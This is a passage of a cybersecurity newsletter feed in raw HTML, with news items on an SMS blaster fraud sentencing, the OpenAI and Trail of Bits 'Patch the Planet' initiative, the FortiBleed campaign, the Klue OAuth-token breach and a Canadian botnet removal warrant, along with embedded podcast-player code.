href="https://www.cityoflondon.police.uk/news/city-of-london/news/2026/june/man-jailed-for-role-in-sms-blaster-fraud-operation-following-city-of-london-police-investigation/?__cf_chl_tk=1C_fncU0Fvrx34rM4XEAV_q.FL8vAq7SjyswtyXcQrM-1782361046-1.0.1.1-uf78B1.1IcztTgc7_Vy97vfLOfODJ5RyDUaVcywQI4Y"><u>was sentenced</u></a> to 48 months&apos; in prison for his role organising an <a href="https://www.septier.com/portfolio-item/sms-blaster/"><u>SMS blaster</u></a> scheme to send fraudulent text messages around London. He convinced another man that he could pay off gambling debts by driving around the city and operating the blaster equipment.&#xA0;&#xA0;&#xA0;</li><li><strong>OpenAI to Patch the Planet:</strong> On Monday, OpenAI <a href="https://openai.com/index/patch-the-planet/"><u>announced</u></a> the catchily titled Patch the Planet initiative that it will run with security firm Trail of Bits to help improve the security of open source software. Further detail in this week&apos;s <a href="https://risky.biz/RBNEWSSI133/"><u>sponsored interview</u></a>.&#xA0;</li></ol><h2 id="sponsor-section">Sponsor Section</h2><p><em>In this <strong>Risky Business sponsor interview</strong>, James Wilson chats with <strong>Trail of Bits founder and CEO Dan Guido</strong> about its newly announced partnership with OpenAI. Together, they&#x2019;ve started a new initiative called &quot;Patch the Planet&quot; to support open source maintainers.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/RBNEWSSI133.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/RBNEWSSI133/&quot;&gt;Sponsored: Trail of Bits and OpenAI patch the planet&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 18:27 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Sponsored: Trail of Bits and OpenAI patch the planet&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <h2 id="risky-biz-talks">Risky Biz Talks</h2><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em> discuss the idea that the People&apos;s Republic of China has mobilised its influence operations against the construction of US data centres and its build out of AI capacity.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/BTN171.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/BTN171/&quot;&gt;Between Two Nerds: The PRC vs AI&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 35:22 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Between Two Nerds: The PRC vs AI&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/WsMh06rcAa4?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: The PRC vs AI"></iframe></figure><h2 id="from-risky-bulletin">From <a href="https://news.risky.biz/tag/risky-bulletin/"><em><u>Risky Bulletin</u></em></a>:</h2><p><strong>The FortiBleed incident is so much worse than a simple credentials leak: </strong>FortiBleed, a massive hacking campaign that targeted Fortinet devices this year, was far more sophisticated than security researchers initially thought.</p><p>Initial reports painted the picture of a campaign that gained access to Fortinet devices, collected credentials and authentication hashes, cracked the hashes, and then the data mysteriously leaked online.</p><p>The reality is that the campaign was far more complex and targeted a lot more things than just Fortinet devices. Compiling data from reports published by <a href="https://www.fortinet.com/blog/psirt-blogs/analysis-of-reported-credential-compromise-of-fortigate-devices"><u>Fortinet</u></a> itself, <a href="https://socradar.io/blog/fortibleed-fortinet-firewalls-compromised/"><u>SOC Radar</u></a>, <a href="https://www.cloudsek.com/blog/inside-the-fortibleed-open-directory-a-technical-analysis-of-what-the-attacker-left-behind"><u>CloudSEK</u></a>, <a href="https://unit42.paloaltonetworks.com/large-scale-credential-attacks/"><u>Palo Alto Networks</u></a>, and <a href="https://catalyst.prodaft.com/public/report/inside-the-fortibleed-command-post-infrastructure-and-ttp-analysis/overview#paragraph-1195%7C0"><u>Prodaft</u></a> we have a clear picture of a broad hacking campaign that began in February this year and was initially just an internet mass-scan and brute-forcing operation.</p><p>[<a href="https://news.risky.biz/risky-bulletin-the-fortibleed-incident-is-so-much-worse-than-a-simple-credentials-leak/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>Klue breach impacts security firms: </strong>At least five security firms have had their Salesforce business accounts pilfered as part of a hacking spree that was traced back to business intelligence platform Klue.</p><p>The Klue breach took place last week, the company admitted in a <a href="https://klue.com/blog/an-update-on-recent-klue-security-incident"><u>blog post</u></a>.</p><p>Hackers accessed its platform via &quot;a compromised legacy credential associated with an integration service&quot; and then stole OAuth tokens that customers had used to connect Klue to other third-party services, such as Salesforce.</p><p>[<a href="https://news.risky.biz/risky-bulletin-klue-breach-impacts-security-firms/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>Canada&apos;s spy agency allowed to remove a botnet from Canadian devices:</strong> Canada&apos;s main intelligence service obtained a court warrant this week to proactively remove a mysterious botnet&apos;s malware from Canadian systems such as servers, home routers, and smart devices.</p><p>The devices were allegedly part of an unnamed proxy botnet. These types of botnets are very common these days and allow hackers to disguise the origin of their attacks and their identities, making their malicious traffic appear as coming from a local residential network.</p><p>According to a copy of the <a href="https://www.fct-cf.ca/en/pages/media/news-bulletins/file-c-6-24"><u>court order</u></a> obtained by <a href="https://www.thecanadianpressnews.ca/politics/canadas-spy-service-received-judges-ok-to-target-malware-infected-devices/article_59146493-96e0-58fc-a176-9e35d3f5c9d2.html"><u>The Canadian Press</u></a>, the botnet was allegedly being used by a threat actor to &quot;advance their financial, political, ideological and economic interests.&quot;</p><p>[<a href="https://news.risky.biz/risky-bulletin-canadas-spy-agency-allowed-to-remove-a-botnet-from-canadian-devices/"><u>more</u></a> on <em>Risky Bulletin</em>]</p>
  105. Srsly Risky Biz: Anthropic Lacks Emotional Intelligence

    Thu, 18 Jun 2026 06:25:00 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Patrick Gray and Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://ent.ai/"><em><u>Ent AI</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/06/data-src-image-d672268e-2d80-4227-ab0e-15abf4f2e0df-1.jpeg" alt="Srsly Risky Biz: Anthropic Lacks Emotional Intelligence"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Patrick Gray and Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://ent.ai/"><em><u>Ent AI</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/SRB171.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/SRB171/&quot;&gt;Srsly Risky Biz: Anthropic has artificial, but not emotional, intelligence&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 31:22 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = 